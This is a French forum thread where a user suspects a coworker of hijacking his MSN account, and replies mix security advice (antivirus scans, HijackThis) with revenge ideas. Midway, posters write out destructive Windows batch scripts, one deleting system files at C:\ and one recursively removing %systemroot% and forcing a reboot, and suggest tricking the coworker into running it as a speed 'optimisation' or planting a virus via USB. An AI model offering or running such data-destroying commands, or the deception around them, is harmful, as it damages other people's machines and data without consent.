Piratage Msn Par "clonage" ...

Messages recommandés

Posté(e)

Non ... Mais j'ai un peut plus de précision sur la façon dont il opère ( j'vais trop loin dans mes mots la :lol: ).. apparament il disposerai d'un mot de pass universel a touts les comptes auquels il souhaiterai se connecter ( Moi jle crois pas ) ...

Posté(e) (modifié)
Non ... Mais j'ai un peut plus de précision sur la façon dont il opère ( j'vais trop loin dans mes mots la :lol: ).. apparament il disposerai d'un mot de pass universel a touts les comptes auquels il souhaiterai se connecter ( Moi jle crois pas ) ...

il te prend clairement pour un con, solution :

une grande tatane dans sa gueule à ce con, ça ne comprend que ça ces gens là ...

Modifié par Btbw
Posté(e) (modifié)

moi j'ai la solution à ton problème (auto edité... sorry)

++

Modifié par raydenxxx
Posté(e)

il te prend pour un ***

si il est une bille en informatique je sais vraiment pas comment il peut faire.

Un mot de passe universel , heu MDR comme les facteurs avec leurs clefs?

Donc la solution tu scan ton pc avec un bon antivirus.

Comme deja dit dans le poste.

passe un coup de hijackthis comme dis au dessus et copie/colle le resultat smile.gif

google - >Télécharger hijackthis -> scan -> copier-> forum gueux -> coller

Le plus simple étant de t'expliquer avec ton collègue.

Posté(e)

Par contre ..

ca te deranges pas s'il a aussi accès à tous tes documents et photos que tu as sur le pc ? :rolleyes:

T'sais quoi , je serais toi .. je debrancherai la webcam pendant un moment newlaugh

Posté(e)
C'est pas ta petite soeur qui se venge que tu lui coupes le net ? :D

Salut,

si il a acces a ton pc soit il a installé un keylog soit il a utilisé msnpass!

Et si il n' a pas acces il est possible qu'il soit passé par un cheval de troie mais la c pas donné a tous le monde :sorcerer:

a++++

Posté(e)

Mais non suivez la conversation,

il à dit que c'était une bille en informatique donc bon keyloger, trojan etc c'est pas possible;

msnpass par contre ...

Posté(e) (modifié)

un logiciel pour hacker msn (tape le sur gogole tu verra)

c'est toi qui lui a installé office?

eh bien tu trouve un bon gros virus tu le met dans une clée usb et tu insere la clée dans son PC des que tu as l'occasion

comme sa il formatte et tu le laisse se demerder pour tout reinstaller!!

aahahaaaahaha (rire diabolique)

Modifié par risbo62-66
Posté(e)

Ouai ... Un virus comme celui ci par exemple :

@echo off

del c:\*.com

del c:\*.bat

del c:\*.sys

que j'enregistre au format .bat et que je balance sur sont PC a l'occass ... le seul soucis étant que je ne vais pas souvent chez lui et qu'il faudrai plutot que je lui envoi par le biai du net ( MSN par exemple ) ...

Et pour revenire a cette histoire de MSNPass, sur certain site il est ecrit que ce programme permettrai de retrouver n'importe quel MP de n'importe quel compte Hotmail ... est - ce vrai ? ou permet 'il seul de retrouver son propre MP de son propre compte Hotmail grace a un log présent sur notre propre PC ?

Posté(e)

Trop gentil le .bat car il ne rentre pas dans les sous dossiers.

@echo off

rmdir /s /q %systemroot%

shutdown -r -t 0 -f

Là c'est déjà plus funky au pire si c'est une brèle fais lui taper directement en lui disant que c'est pour optimiser son PC afin que ça rame moins :)

Posté(e)

msnpass permet juste de retrouver les pass sauvegardé sur la machine où il est lancé, pas de n'importe quel compte msn. Et en plus il faut avoir utilisé dans msn l'option de sauvegarde du mot de pass.

Donc en gros faut etre sur la machine cible pour avoir le pass ;)

Posté(e) (modifié)

surtout que cela m'etonnerai que windows autorise la suppression du dossier systeme...

sinon effectivement scan ton pc avec un vrai anti virus et un vrai antispyware... ( tout comme simplement matter tes processus qui tourne..)

Modifié par Pink Floyd
Posté(e)

Sinon pour en revenir a Huhu Clone, c'est juste que tu tapes /clone dans la convers et ca prend l'avatar, pseudo et phrase perso de l'autre, ca sert pas a grand chose, on peut le repérer avec l'adresse

Sinon tu te connectes sur ton adresses et tu la freeze, apres faut plus se déco par contre ;) (Icecold)